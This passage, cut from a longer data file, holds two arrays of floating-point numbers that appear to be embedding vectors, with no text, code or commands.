01484829,0.02758047,0.010517385,0.0057402737,-0.004344148,-0.0050881607,-0.0002641074,-0.007754286,0.01152792,0.010141223,-0.008272288,0.014463887,0.012557071,-0.0025295028,-0.016030543,-0.04989258,-0.0019367662,0.128515,-0.016480977,-0.006997421,0.017488915,-0.0019616093,-0.0011919127,-0.078265354,-0.015519366,0.018578885,-0.009547684,-0.0068333214,-0.025020698,-0.025709238,0.038132817,0.011963864,-0.02398683,-0.023437802,-0.012973199,0.008298133,-0.019747777,-0.02175094,0.0076230196,0.007893502,0.0074326633,-0.0169225,-0.00038379713,0.013390671,-0.01877918,-0.011503789,-0.019140739,0.010546288,-0.0054530855,0.0072241193,-0.011229154,-0.008590216,0.012075125,0.0067683025,0.001655072,-0.015925942,-0.01619889,0.01749778,0.0037099684,-0.022828845,-0.018360702,-0.14442632,0.010141362,-0.002731508,-0.029586028,0.01606418,-0.020102138,-0.010277481,-0.006243682,0.023305086,0.007456723,0.008061684,0.0020710754,-0.009671684,0.010658166,-0.03681613,-0.01355646,0.0041929395,0.007687667,-0.0059081046,0.0025970587,-0.001030647,-0.015885057,-0.010849661,-0.019042473,-0.015771046,0.008201996,0.00010245778,0.033201978,0.0041752323,-0.0017347522,0.004943517,-0.0049542664,-0.015063677,-0.011716573,-0.016832901,-0.01864271,-0.020448584,-0.012779281,0.00698312,0.024329174,-0.020265697,-0.006641234,-0.001470956,-0.016730074,0.017598517,0.032401685,0.00423921,0.008515774,0.013573644,-0.0018949582,0.044252783,0.0048048142,-0.0038688676,0.008786267,-0.0006555195,0.014339879,0.0058643697,-0.012205633,0.0035980602,0.0062510697,0.006347398,-0.024180038,-0.010012673,-0.010949344,0.04475082,0.005124334,-0.019749928,-0.008928233,-0.0021841303,0.002297753,-0.00842315,-0.0011853626,-0.0011108622,-0.023918217,0.013704858,0.021406483,0.0020677473,0.024243977,-0.007983712,-0.024116626,-0.0061011305,-0.014181406,0.014145445,-0.035355657,0.014576638,-0.008678963,0.008088075,0.010367436,-0.014153794,-0.020485148,0.031101985,-0.008637279,0.0029276293,-0.021197759,0.015548406,0.004595313,0.043751832,-0.0024886518,-0.018193645,-0.00011776908,0.0040913536,-0.006777916,-0.013952173,-0.006629428,-0.013607647,0.008557679,0.0020554366,-0.026069524,-0.01893851,0.007536562,-0.00070648553,-0.008961092,0.021499854,-0.017973458,-0.02048395,-0.022464829,0.032650754,0.0034533006,0.008960199,-0.046329092,-0.019625906,-0.0046689026,0.006485121,-0.00057960034,0.029377105,0.014832407,-0.03828867,-0.0042929975,0.001801425,-0.011502311,-0.017045554,0.038175542,-0.0017078905,0.00015670163,-0.014947618,-0.0047904416,-0.0064580776,0.03283552,-0.038440842,0.010852154,0.0029757284,0.0020904036,-0.011394073,-0.013332995,0.012481136,-0.013331055,0.02391543,0.00034519838,0.0124264555,0.010050124,-0.0038993056,0.028863141,-0.020908423,-0.006496054,0.00657997,0.04615869,0.010519704,-0.016401242,0.019332359,-0.0034289446,0.0035739203,0.02873092,-0.018118009,-0.0049289884,-0.00016143778,-0.031423233,0.011562099,-0.013137679,-0.001012977,-0.008891988,0.0035219002,-0.011711441,0.031685174,0.0061042923,0.0028444105,0.008569556,-0.018103937,-0.011698738,0.024042012,0.013414741,0.0007542319,0.010439776,0.03109757,-0.016716158,0.010259962,-0.0041028173,-0.007991509,-0.0014512378,-0.0048519527,0.0038627721,-0.036744837,-0.014073133,0.004604287,-0.009440391,-0.027408596,0.010015807,0.016330466,0.008437928,-0.018206451,0.0066525703,-0.016292948,-0.007369994,0.025972938,0.0046791784,0.0077789407,0.0060857013,0.03214945,-0.015044319,-0.021546174,0.022809325,-0.0071231145,-0.009311912,-0.00055061,-0.0047296076,-0.022137338,0.00505931,-0.015258999,-0.033874184,0.0008301252,0.009438707,0.00057072256,0.0032330186,0.01909345,-0.0046247174,-0.00086770917,-0.0029418992,-0.008895011,-0.016060023,-0.0017560219,0.014815608,-0.019975623,-0.009080294,0.00064100215,-0.006949333,0.030332604,0.0076360055,0.02993381,0.014181578,0.0018196268,-0.011716638,-0.031903736,-0.0055460366,0.017722145,-0.01631278,-0.016429145,0.016282817,-0.0046332306,-0.01593502,-0.007078232,0.016597634,0.01683669,0.012236737,0.007210303,0.016834032,0.0030222267,0.005354362,0.013042889,-0.011509775,-0.0019806386,-0.0018692601,-0.02709819,0.0015273392,0.008448221,0.001626594,-0.03449041,-0.0011404221,-0.014445332,0.005638058,-0.038342036,0.0026714304,0.039624885,-0.000645893,0.015080801,0.019530078,-0.006094902,-0.019229496,0.01611657,0.0063295867,-0.028058158,0.021038618,-0.0043655424,0.009394438,0.0070881722,-0.018694943,0.025191404,0.0069406675,0.021143058,-0.0076469723,0.016013443,0.0042963345,0.0037264267,0.036348794,0.0017959187,0.016490074,0.0058391583,-0.029684827,-0.0027575814,-0.018171053,-0.0025154727,-0.0101297805,-0.00024260522,0.0002401843,-0.0028234224,-0.026465485,0.0006844093,-0.030734548,0.03384669,0.016141107,-0.0153006455,0.008043733,0.011161553,-0.0053235153,-0.0076769665,-0.010855518,-0.012398782,0.0031852396,0.020143395,-0.005401437,0.0042926464,-0.026819168,0.025721937,0.02307729,-0.0044721253,0.025079882,0.0025959709,0.006559484,-0.0058755074,0.017449286,-0.0016488043,-0.004756809,-0.009519776,-0.00745899,0.015921708,-0.025091253,-0.0056766653,0.0074351896,0.012538809,-0.0019364977,-0.0070700683,0.01597569,0.016415749,0.011606457,0.011299843,-0.009243417,0.012924836,-0.0063628284,-0.0051958067,0.0051022214,-0.02102515,-0.022425137,-0.020372815,0.027086938,-0.014129755,0.0030591078,0.019076837,0.012940474,0.019508427,-0.027570965,-0.02344428,0.008971801,0.0013348875,-0.0051865983,-0.012195287,0.010377008,0.000684432,-0.0015014551,-0.004251563,-0.006756297,0.017329756,-0.011469305,0.008650945,0.008717168,0.02021429,-0.0064044464,-0.025885526,0.01181259,-0.013197557,0.004556203,-0.0043892595,-0.02227052,-0.00084505486,-0.0063866605,0.06287523,-0.019572956,0.02175524,-0.002900067,0.024936052,0.020212581,-0.0023154065,0.0076252995,-0.023881704,-0.022402935,-0.012190944,-0.017681576,0.0030191536,-0.0022447803,-0.040641177,-0.023665918,0.015465481,0.00031485234,-0.00483292,0.000047988826,0.013946248,0.0060182223,0.024604943,0.0063642515,-0.017725183,-0.05486984,-0.025712209,-0.004235121,-0.02296816,0.021612464,0.030682275,-0.01633024,-0.023627158,0.008917165,-0.029637937,-0.01092242,-0.00025084938,0.0102049215,0.018936593,0.026910378,0.02509246,0.011441805,-0.011116883,-0.012940075,-0.011251749,-0.008422322,-0.025328694,-0.0011378545,-0.005528851,0.025915403,-0.020246776,0.0045742663,0.008403746,0.037844684,-0.02076957,0.008352785,0.008961582,0.002247935,-0.011548884,-0.0022259874,0.014374472,-0.0055995546,-0.019199548,-0.0041524908,0.0010589408,-0.0017283226,-0.021613637,-0.0070053465,-0.014603212,-0.013685234,-0.0053666495,-0.008477427,-0.0027801346,0.0149747105,-0.0108276345,0.0030404893,0.003112726,0.0015648012,-0.024651911,0.009369332,-0.009105284,0.0074360287,0.0065453914,-0.012205099,0.011943118,0.023530237,-0.011891224,0.015169053,-0.00288975,-0.0009259221,0.03766075,0.00827784,0.022725454,0.001497596,-0.0045342064,-0.0071471566,0.0030492644,-0.022359274,-0.0035324958,-0.030454565,-0.016675936,-0.006624511,-0.0058425325,0.008409807,-0.029771296,0.01576369,-0.13123797,0.010020498,-0.01877757,-0.026249854,-0.012286484,-0.016301991,0.009795117,0.018834287,0.0008891563,-0.052560836,0.008038706,0.030143248,0.017485779,-0.004469197,-0.018652169,0.011352954,-0.020284567,-0.0067288782,0.008802375,0.021842858,0.013034053,0.0014811333,-0.0020407226,0.00060267217,0.008603099,-0.0047370135,0.007153152,0.012283424,0.0060179094,0.0047240444,0.005433549,0.0031694695,0.012161412,0.021039106,0.0017937153,0.013680192,-0.006771615,-0.0020763834,-0.011446361,-0.001480241,0.003324697,0.0061008264,-0.014002457,0.028862858,0.006523556,0.000048170445,0.0077463533,0.031432953,0.0068177483,0.015640303,-0.011376581,0.004528206,0.010833534,0.014761776,-0.012742201,0.0076938313,-0.013018384,0.018346354,0.01404382,0.0042118803,-0.019935882,-0.017954936,0.0007294498,-0.0032146552,0.0033896654,0.018128263,0.00027525803,-0.007568515,-0.039251745,0.013966291,0.0033259136,0.02079073,-0.002378944,-0.00017408808,-0.011154064,0.0060853423,0.018640997,0.00030767373,-0.0187076,0.030694244,-0.04239741,-0.006766006,0.004247046,0.049414437,-0.001125397,-0.024179164,-0.013229952,0.007403547,-0.022368545,0.017493077,0.0049478547,-0.009608198,0.0022722683,-0.008542261,0.0075602224,0.017884765,-0.017456535,0.03198691,-0.020209184,-0.011134517,-0.017680183,0.008135757,0.005725898,-0.030916631,-0.10048001,-0.0060685957,0.019275399,-0.013629415,-0.01233804,-0.0075702462,0.015052074,0.0062200683,0.029399684,0.020699823,-0.026643235,0.015034545,-0.023378795,-0.004177375,0.002909216,0.006910606,-0.039550606,-0.014054119,-0.0006468407,-0.00686115,0.00921974,-0.014278998,0.0017115601,0.009150666,0.010824133,0.003685018,0.016740937,0.021210922,0.010348937,-0.005029271,-0.006500187,0.016890218,-0.0070830523,-0.011518638,-0.03151835,-0.004425463,-0.0027854973,-0.013112978,-0.0097384015,0.023718944,0.0067673647,0.0039310763,0.01213228,0.016047528,-0.009448743,-0.008013287,0.012531946,0.015472863,-0.003374767,-0.0025498858,0.0020411762,0.0014038647,0.006353113,-0.00088786,0.0052149547,-0.013431233,-0.012264627,-0.0025300316,0.021950612,-0.0075307675,0.0036812443,0.027909055,0.016058456,0.014585478,-0.0068531306,0.017022416,-0.009840492,0.01075436,0.016476765,0.0036956605,-0.016132075,0.029994693,0.0009972817,-0.019819288,0.043724045,0.010251497,0.007365234,0.0039194506,0.019189019,-0.0053133788,-0.0023990618,-0.018485399,0.0019371882,0.01157517,-0.04333649,0.021057013,-0.006368407,0.0012099276,-0.016099127,-0.0005168485,0.015799083,-0.008103365,-0.0013827163,0.026956884,0.003945547,0.0048464327,0.03793629,-0.005053601,-0.023807894,-0.012894173,0.0026198071,-0.010047937,-0.013017146,-0.033222686,-0.020028919,0.013539192,0.03831088,-0.00065148575,0.009339375,-0.0005241809,0.023261625,0.02527923,-0.012828161,-0.0021803847,-0.0070186956,0.017506842,-0.01198523,-0.012681067,-0.002434545,0.01302199,0.02905078,-0.0031050618,-0.005523846,-0.006905039,-0.0064044227,-0.03489344,-0.024708921,0.009173195,0.019433912,-0.026087685,0.00063422497,0.012781983,0.023245707,-0.030494051,-0.022635292,0.009361766,-0.0069752103,0.018935109,0.008513298,-0.01638106,-0.007215294,-0.0056450167,-0.014603293,-0.0025944442,0.008591646,-0.009130521,-0.04220621,-0.016550947,-0.019767893,0.010031897,0.00764843,0.022133553,0.028645016,0.028737474,-0.0019972494,-0.0005335983,-0.008234164,-0.013256482,0.0061255875,0.022881098,-0.028836682,-0.0062094964,0.013031017,-0.01531838,-0.0000666919,-0.010003316,0.002177412,0.009964627,0.016087757,0.020987779,0.0073960917,-0.009890004,0.009248951,-0.064745694,0.011937596,0.0030995915,0.021765191,0.016930599,0.04109578,0.013053371,-0.013265362,0.0003747308,0.003997321,-0.009532474,-0.014404524,0.013506194,-0.000075295204,-0.00756391,-0.0051139994,-0.0037531226,0.014086146,0.019551769,-0.009408326,-0.008367911,0.007278494,-0.008425632,0.00041417003,0.029828345,0.0036272549,-0.011873341,-0.018875614,0.016797783,0.015296824,-0.029999744,0.022262458,0.011294059,0.0035978444,0.03265139,0.023186386,-0.0065814294,-0.013175433,0.019831276,-0.00696019,-0.016734842,0.0066781742,0.046689857,-0.029855402,-0.040131044,0.01808877,0.012682398,-0.024653118,-0.021040855,0.0037364794,0.025206905,-0.021189492,0.04706384,0.016216194,0.02714538,-0.030871447,-0.013560716,-0.010423571,-0.0069498713,-0.016494222,0.0026654983,0.0035060134,-0.0077082925,0.025030157,0.015462902,0.0024832725,-0.007627051,0.030292403,0.001542907,0.021938222,0.02237676,0.022839855,0.014205953,-0.008759277,0.0027135208,0.0110261,0.021764468,-0.0061513847,0.0037698674,-0.003150007,-0.008726672,0.013772331,0.0035798135,0.012199143,0.007108584,-0.01094657,0.01991023,-0.005147765,0.00007664256,-0.011178727,-0.008437255,0.0054208282,-0.0008103368,-0.0021096028,-0.0070298463,-0.006656959,-0.0063409223,0.021152264,0.0005021594,-0.0043780226,0.023844868,0.030897249,-0.0052782744,0.0053391084,-0.016768549,0.011928016,-0.0013535394,0.0012679488,-0.0032271117,9.2465444e-7,0.010176677,0.003357888,0.004978068,0.01219974,0.00825804,-0.03452644,-0.01189972,0.002225446,-0.014684361,0.0049952604,-0.004796736,0.0066645457,0.014428982,0.020109795,-0.00086136925,0.019357532,0.022106376,-0.002198613,-0.004080673,-0.0023417152,-0.0019998911,0.004113787,-0.01879205,-0.0027464565,0.020075519,-0.020156752,-0.015975902,-0.004657258,0.00052429055,-0.0016695113,0.01985824,0.0057663135,-0.012788394,-0.0034220838,0.0048482884,-0.033084612,-0.0058787456,-0.017927613,0.0007307958,0.028591197,-0.0040048254,-0.0059684627,0.02424367,0.0029021353,0.026617179,-0.019584421,-0.01722503,0.011341577,0.05172529,0.021585578,-0.013874895,0.02848751,0.0013242387,0.007766036,0.03906159,-0.018436838,0.003228855,-0.00078432687,0.005912274,-0.008383489,0.006727319,0.0034995482,0.004897102,0.0064552207,-0.010495367,0.008180649,-0.001291218,0.003808163,0.002356607,-0.008274592,-0.012027764,-0.014253425,0.01953118,-0.02511012,-0.010156461,0.018310614,-0.0022597464,-0.020352382,-0.0059439926,-0.004172015,-0.020286847,0.00003604856,-0.00871,-0.015544979,0.008352309,-0.019540817,0.01200009,-0.0065000844,0.029614625,-0.030783886,-0.01923748,0.0075257975,-0.09078656,-0.0027940248,0.023594605,0.017571116,0.05300038,-0.0034425864,-0.0030713899,0.0040485426,0.01283992,0.0016436059,-0.0008980499,-0.010007417,-0.008135332,0.01965226,0.038874194,-0.015431317,-0.010571027,0.015040973,-0.006233398,-0.020143425,0.0059119808,-0.004382664,-0.007351719,-0.014587502,0.017578766,-0.01081035,0.0046090195,-0.015980778,-0.0057929642,0.007880146,-0.0010336518,-0.0029917562,-0.002676011,-0.014653528,-0.0030240845,0.0069217305,-0.0067194384,0.007468713,-0.03637254,-0.05259735,-0.007887962,0.00068445347,0.007671538,0.016149605,-0.044240225,0.017763952,-0.036235776,0.011985734,-0.006887367,0.015193611,-0.012947067,0.00070101226,-0.005847002,0.022916222,0.0014024667,0.010223479,-0.010255643,-0.017496025,0.022090686,0.0053749764,-0.00654781,0.011989261,0.013384403,-0.0081796395,-0.0052709025,-0.026260907,-0.0014994475,0.0076103266,-0.0037220553,-0.006055585,-0.0041220854,-0.023431068,-0.025576457,-0.006489992,-0.012180691,-0.0025158408,0.02057841,-0.005069662,-0.007506336,0.0056579737,0.030629346,0.0005650177,0.028908582,0.01114965,0.022454219,0.0030841788,0.00705696,0.021660803,0.037534915,-0.0022343483,-0.021184992,0.000050413153,0.020310206,-0.009027743,0.00850452,0.016575653,-0.015863575,0.012442229,-0.004743495,-0.0012317607,0.010925193,-0.0025524262,-0.002217468,-0.012432518,-0.013841652,0.009931354,-0.009413177,-0.01182126,-0.010902492,-0.03234189,0.0006177418,0.025165683,-0.0029672228,0.022159172,0.013054783,0.013314389,-0.0023969482,-0.003379327,-0.0121489,-0.03412639,-0.0055016363,-0.0029020598,-0.0070532714,0.012136576,0.01686368,-0.010671675,0.0008122299,-0.006910448,-0.018113349,0.011852365,0.006729761,0.009061863,0.021514386,0.013324682,-0.01947954,-0.0071815266,-0.008928526,0.0019589048,-0.0070761624,0.019081473,-0.0018701945,-0.013893687,-0.0010404633,-0.00881848,-0.020563377,0.014576495,-0.010311683,-0.023370884,-0.0067755934,0.0035388118,-0.0059049046,-0.007028495,-0.00023653316,-0.007770686,-0.011081671,-0.0057491995,0.014865639,-0.014300558,-0.019628167,-0.010928197,-0.0080800075,0.0055990764,-0.01035084,0.0019681817,-0.007518724,0.01866379,-0.0052634617,0.014063347,-0.02002359,0.0044328314,-0.0006638713,-0.027110958,0.0029670154,-0.011134786,-0.018483499,-0.01695897,0.011084526,0.0017603697,0.0125615895,-0.009353438,-0.023802286,0.0031731296,-0.01602824,-0.014189337,-0.030193267,-0.014497992,0.002473252,0.0067366655,0.005444585,-0.005072106,0.006374818,-0.020044446,-0.011436942,-0.01308649,-0.023785228,-0.027109316,0.0022631553,-0.00386488,-0.019587234,0.006854046,0.009292826,0.015418482,-0.008326336,0.021831231,0.054332178,0.0253059,0.009223243,0.017474724,0.005905536,0.008753916,-0.004422782,-0.0045451075,0.019669296,0.122803815,0.0007705992,-0.030879708,-0.012394567,0.005345542,-0.020542676,0.010101,0.008202618,-0.0006939539,0.012116616,0.013982783,-0.030769087,0.016304621,-0.004124706,-0.011767076,0.022274788,0.029334532,-0.025129477,0.01612463,0.00006595518,0.0043414035,-0.028826272,-0.010267025,-0.041862685,-0.0061639915,-0.07385492,0.011749943,0.03375008,0.0062834364,0.027726626,0.020512836,0.0055364016,-0.00009606238,0.014137978,-0.0037039595,-0.002312032,-0.0048779454,-0.014158795,-0.0021358132,-0.02009684,0.025363471,0.0051022135,0.015582476,0.0002743866,-0.015493201,-0.006618198,0.002632369,0.00063761644,-0.0057346523,-0.009011621,-0.0007072902,-0.005928841,-0.02087598,-0.02034063,-0.0010286231,-0.01065442,-0.009381258,0.002960799,0.012829652,-0.016269548,-0.0060824687,0.013423023,-0.010854783,0.0062436843,-0.0029596894,0.010980296,-0.018259082,0.0019198315,-0.020888096,-0.015818693,0.01677882,-0.00095392164,0.007838287,-0.013427372,-0.0023362306,-0.0020173923,-0.0054809023,-0.006143132,-0.0031770822,0.00233275,0.0055534444,-0.010440903,0.024011614,-0.0053345673,-0.0023034296,-0.0052015213,-0.015175415,-0.004579404,-0.012250164,-0.015412563,0.0007824728,0.011856841,0.01594149,0.026646608,-0.013223719,-0.016801406,0.008524989,-0.013828478,-0.0036000945,0.0135112265,-0.028357748,-0.015995493,0.008158697,0.011741225,-0.013765415,-0.02428412,-0.018363575,-0.013447624,-0.016401846,-0.0015828199,-0.0048369877,0.027443862,0.013788623,0.015898725,0.01733216,0.029867493,-0.034647334,-0.03041487,-0.00046887255,-0.018505624,-0.0029592465,0.02947632,0.01458337,0.047249395,-0.0036229917,-0.011953858,-0.028152784,-0.012736165,0.017915715,-0.028605156,0.00509132,-0.04529174,0.010277192,0.018351223,-0.00599718,-0.0032697092,0.012431075,-0.0029590474,0.019109948,0.0026321935,-0.0048270063,-0.01954913,-0.0009784102,-0.0027655957,0.010724372,-0.018031139,0.01677644,-0.016940918,0.0032796753,0.0025230767,0.0104823755,0.009196435,-0.0014856398,0.0020883947,-0.02023926,-0.018954813,0.0037553282,0.024795923,-0.011932039,-0.015355587,-0.0017522967,-0.018993001,-0.009539485,-0.045288328,0.02637503,0.019483676,-0.0028186713,-0.0058740876,-0.013383681,-0.011286633,-0.0029266127,-0.009665236,-0.012049562,0.004778092,-0.017204698,0.02385779,0.026775558,0.0120730335,-0.010361973,0.0054827346,0.009429881,0.007225675,-0.010283098,-0.04271939,0.022784697,-0.010992075,0.015748797,-0.011151926,-0.022762546,0.041651983,-0.011448994,-0.010668356,-0.0049748556,0.0119806,-0.016701397,0.023418404,-0.020749014,0.03732934,-0.019518234,-0.033423536,-0.003871427,0.012580001,0.0070401165,-0.028035345,0.010613098,-0.008601957,0.0017749575,0.0052548386,0.02412287,0.013363811,0.0244705,0.0007247819,0.0051011974,-0.032878738,-0.0035543027,0.017926691,-0.01810794,-0.03266416,-0.006597258,0.004128396,-0.025928518,0.012345783,-0.021077124,-0.0075776777,0.011689475,-0.0028110682,-0.010262773,0.0014790954,0.009590854,-0.0120361885,0.0031685021,0.026112007,0.0104310345,-0.01187669,-0.011148485,0.0037678278,0.045012932,0.01104488,-0.013462923,0.030097635,-0.010860054,-0.006346446,0.02056179,0.0036253224,0.006204683,0.013030485,-0.026743768,-0.018136702,0.0071732253,0.003393294,-0.044167455,-0.010468008,0.0023678325,-0.023363367,-0.042297665,-0.01858177,-0.014020359,0.00907308,-0.00051719835,-0.009305877,0.005664207,-0.0015349408,0.0034652094,0.023583917,0.0008431621,-0.002540267,0.022584088,-0.020307504,-0.016117891,0.009229615,-0.013120845,0.0005796957,-0.009663464,0.037312727,0.030581651,0.006565871,0.0015385969,-0.005606715,0.008715061,0.0029944507,-0.002709218,-0.027184624,-0.0070658326,-0.032348324,0.0022037337,-0.010041444,-0.020482248,0.020018809,0.07796771,-0.056858942,-0.015471959,0.0077045998,-0.0000176172,-0.00046530768,0.04080353,0.019979935,-0.018285897,-0.00039337,0.0041036224,0.007137574,0.0073532923,-0.026481057,0.0044483435,0.0083010085,-0.013066387,0.0027670327,0.020862238,0.0027073135,0.0021403008,0.020044114,-0.0074003404,0.00080422167,-0.000089902074,-0.009040271,-0.007943012,-0.027910504,0.0057628993,0.020777723,-0.007370115,0.02584555,0.010819399,-0.009272801,-0.00331311,0.016518086,-0.01053976,0.03419697,-0.004662401,-0.014794701,-0.01807435,-0.0028926057,0.0006082199,-0.001229353,-0.005973519,-0.02501681,0.0006303759,-0.003038108,-0.012888723,0.15054454,-0.0060232515,0.018071318,0.018944263,-0.013879471,-0.0072824876,0.0020268008,0.020961093,0.008920002,0.0020923293,0.028049683,0.002825065,0.012433461,0.03220467,-0.0039570127,-0.0018739074,0.024602883,0.14163788,-0.0042434805,0.024791993,-0.009944693,-0.008008719,0.0188568,0.00023730038,0.0073685036,-0.025157219,-0.00030601068,-0.035235632,0.0050437804,0.014808074,-0.016441807,-0.008244961,-0.006845401,0.00667481,-0.012005104,-0.00013598088,-0.015054414,0.0076929773,-0.0241613,-0.017402424,0.034321886,-0.0152899,-0.010228249,0.0020362106,-0.009462927,0.012231703,-0.0072622676,-0.0041616694,0.010166728,0.018041946,-0.008774624,-0.009397672,0.020055976,-0.012704625,0.00007009362,0.01711958,-0.0035470698,0.023012625,-0.010101528,0.029559834,0.0016180231,0.013706618,-0.0019509528,0.011947429,-0.0070580477,0.00045526915,0.00072446483,-0.0024190233,-0.009115615,0.000006276182,0.012106366,0.02613437,-0.0068745497,-0.00869523,0.020151524,-0.013663079,-0.00007701212,0.011094778,0.017650357,-0.01248458,0.011703448,0.014229835,-0.018922256,-0.0017977883,0.014884342,0.0061580436,0.021725094,0.0057562217,0.014830729,-0.00856,-0.0035810627,0.0001353587,-0.010713578,0.025547585,0.0017501421,0.020857403,-0.004193547,-0.0011935037,0.015241152,-0.01823402,-0.0007573397,0.031190287,0.010163692,0.009819664,-0.008839647,0.02124104,-0.00075362046,-0.032037124,0.009098138,0.009975615,0.015853459,0.0036130291,-0.018573027,0.021394776,0.000031131873,-0.008103968,-0.013948782,0.0032331035,-0.023708435,-0.0077191857,0.014260318,0.00007380036,-0.00094409136,0.00014743826,-0.0041842144,-0.0047200536,-0.008220761,0.009818636,-0.011377837,0.004445957,-0.012463999,0.0031698174,-0.012000139,0.030240418,-0.006905712,-0.020965174,0.01225533,-0.027904956,-0.006780051,-0.031921186,0.007360294,0.017341714,0.0017253034,0.0046647526,-0.008471951,0.003998172,-0.0022088343,0.0011812001],[0.013917525,-0.0019342201,-0.023823848,-0.01750734,0.009278205,-0.014090244,0.0033850428,0.014545753,0.00756816,-0.017039757,-0.010146268,0.017202718,-0.004411052,-0.0014312116,-0.017034335,-0.008545054,0.012367339,0.0035188743,0.008000719,0.0039322847,0.008390607,0.0026127154,0.031590015,-0.008711506,0.0011362899,-0.0060691554,-0.0037211718,0.018029097,0.0026881734,0.008171374,-0.009201832,0.01796321,0.019475514,-0.005364285,0.017344767,0.015771583,-0.015291233,-0.027440084,0.012845082,-0.0066564977,-0.003848878,0.013724041,-0.013703224,0.032208364,-0.009343701,-0.005047444,-0.0054470045,0.023834392,-0.0131790815,0.010657171,-0.0008898336,0.0062612244,-0.035585742,0.0044147433,-0.0029445742,0.0114089865,-0.006518336,-0.03152046,0.017824696,-0.0027074597,0.00021442471,0.027232138,0.012075784,-0.016946228,0.020432841,0.00975802,0.0070128483,-0.018112764,0.00020916347,-0.013331517,0.001290757,-0.0070939204,0.011774317,0.0075782347,0.019848991,0.012628296,-0.0025095236,0.0013880373,-0.0075845397,0.01937709,-0.017369406,-0.0004600137,0.006513826,-0.0027301016,0.01152646,0.012983589,-0.0055151694,-0.018456364,-0.0015422127,-0.012885031,0.011730138,0.012139643,0.018332891,0.011089851,-0.004631812,-0.007156326,0.0176098,-0.012310864,0.004251787,0.016995795,-0.0046071224,-0.009782737,-0.0072131865,0.0116020385,0.006531555,-0.022851672,-0.0057596345,-0.019250844,0.008821036,-0.025037628,0.011295306,0.016024742,0.005749691,0.00394141,-0.008806302,-0.02135806,0.0040563573,0.011352149,-0.0016940809,0.012818542,-0.008528263,0.0349084,0.0003903552,-0.008724451,0.0076751923,-0.016917787,-0.0035028423,0.0109020425,0.00009359312,-0.0017741275,-0.019146245,0.029345607,0.0059889364,-0.011078909,-0.0007106399,-0.0065049003,0.0044235485,0.023777826,-0.013472347,-0.009074798,0.023239393,-0.00037581925,0.0094307205,-0.02288169,0.011603625,0.01020643,-0.003571213,0.02563036,0.017003959,-0.018469866,0.007049271,0.020365078,0.0051166117,-0.031187683,-0.0067731766,0.019048542,0.006792997,-0.0032404647,-0.026393386,-0.0020921505,0.005481111,-0.014040761,0.018818328,-0.015727313,-0.020120138,-0.026495526,-0.0139808925,-0.0124812275,-0.017189182,0.013135796,0.020182744,0.032893747,0.00864693,0.010166675,0.004816976,0.0065246145,0.01156899,-0.026488502,0.0011792061,-0.0105640795,0.0011055942,0.009362961,-0.02423346,-0.0036944721,-0.02259752,0.037940994,0.0131269,-0.016568316,-0.013460364,-0.01380783,0.0030324738,-0.032242656,0.008426253,-0.01019605,-0.019280834,-0.010779223,-0.014751092,0.08836368,-0.003867422,-0.010944796,-0.03939739,0.023006614,0.013114754,-0.034109022,-0.0029298184,-0.012834293,0.0028737222,-0.006663469,0.0003503595,-0.012342869,0.024360454,-0.029184023,-0.01442888,0.005299969,0.002952347,-0.052260738,0.021761049,0.018771898,0.018190477,-0.0041583534,-0.032522418,0.005816266,0.0075340425,-0.022512512,0.0030620887,-0.030768808,0.0035915934,0.0057319375,-0.016390372,-0.015811818,0.008374013,0.013907319,-0.010723678,-0.015144152,0.021947365,-0.011254829,0.011624629,-0.005878071,0.008782076,-0.012225741,-0.008449872,0.0062869433,0.028425517,0.015273401,-0.01027511,0.0026632615,0.030169507,0.007158733,-0.01878285,0.01398653,0.0067810314,-0.014798159,0.0004993344,0.036023926,-0.003130786,-0.027512858,-0.014559733,-0.0058699604,0.01907261,-0.0043173796,0.031668007,0.02050609,-0.010309127,0.037468597,0.019293027,0.004485373,0.00349832,-0.05013567,-0.001901261,-0.022947444,-0.023483844,-0.0027997612,-0.010707161,-0.00027610804,-0.011767291,-0.009347935,0.032645922,0.014204864,0.020215664,-0.019835884,-0.0031675242,0.016696617,0.0042131166,-0.021364855,-0.008982609,0.00473394,0.002152023,0.008836734,0.03125682,-0.007998546,0.01621064,0.0022579893,0.011695457,0.007169907,-0.018422673,0.0010312082,-0.021939438,0.020033283,0.01273817,-0.006238311,0.0066443635,-0.0041191736,0.012524589,-0.009566595,-0.0050757523,-0.0076604327,-0.008916231,0.038405173,-0.0017846707,0.009809011,-0.04552918,-0.012657951,-0.00585713,0.00090521964,-0.0082731405,0.019955283,0.0020495118,-0.001379812,-0.013848455,-0.018276174,0.020742847,-0.02384229,0.007393679,-0.02840925,-0.016904876,0.00046450098,0.014577409,-0.01635077,0.035067312,0.010690856,0.0041011563,0.016363895,0.01277933,0.015221789,-0.024668641,0.02591078,-0.012441772,0.007882016,0.014578088,-0.02333503,-0.020001736,-0.018612038,-0.0028070975,0.018603884,-0.0070010875,-0.023880344,0.0064588226,0.0006635579,0.01191162,0.004179455,0.012452361,-0.011575019,-0.009491627,0.012691885,-0.039095733,0.0059837173,-0.0113932025,0.0032569086,-0.0067330035,-0.031145087,0.03471368,-0.016121,-0.029283198,0.004043054,0.09765142,0.008124928,0.013998443,0.0071995156,-0.015137804,-0.0049216393,0.018671155,0.016064512,-0.01103331,0.018704083,-0.009584435,-0.0008930128,0.010537112,0.029652627,-0.02422536,0.0052516116,-0.016613243,-0.010688416,-0.037524804,-0.018093714,0.019178297,-0.026180707,0.0133310575,0.009402209,0.015089865,0.021690693,0.0058599296,-0.006735756,-0.01077173,-0.01888824,-0.0075907577,-0.0018544947,-0.005173919,-0.0034916608,-0.053147253,0.0067478186,0.0049918103,-0.0025234895,-0.033337053,-0.025089145,0.010359559,0.014770161,-0.0011636507,-0.018166363,-0.023692664,0.03985034,-0.00822024,-0.00044085144,-0.034928765,0.020552458,0.012138542,0.023438634,-0.012866695,0.01104227,0.004018626,0.0049334937,0.014276792,-0.015744016,0.043984696,0.04503333,0.0036509968,0.014278962,-0.004269702,-0.0070692967,0.001832162,0.020456722,0.00079840503,0.0056367205,0.0030857495,0.0068430156,0.00083262374,-0.0026877325,-0.004247141,0.02238446,0.014806551,0.0004861229,0.013213252,-0.017247824,0.0017496655,0.020901646,-0.0038145252,0.014359548,-0.004652613,-0.009175526,-0.010475911,-0.0030368632,-0.007795279,0.0071158605,0.024913184,-0.0011188216,-0.002603444,0.008771475,0.03197034,-0.007539042,0.01290655,0.020473037,0.010105737,0.020575335,-0.0043693557,0.004031554,0.0004710212,0.008821248,0.0058072833,-0.0002889317,-0.0103433365,-0.003048509,0.012223964,0.003507168,0.004722749,0.02948968,-0.02020026,-0.0031638632,-0.0065146205,-0.020142118,-0.01603985,-0.041810706,-0.00411329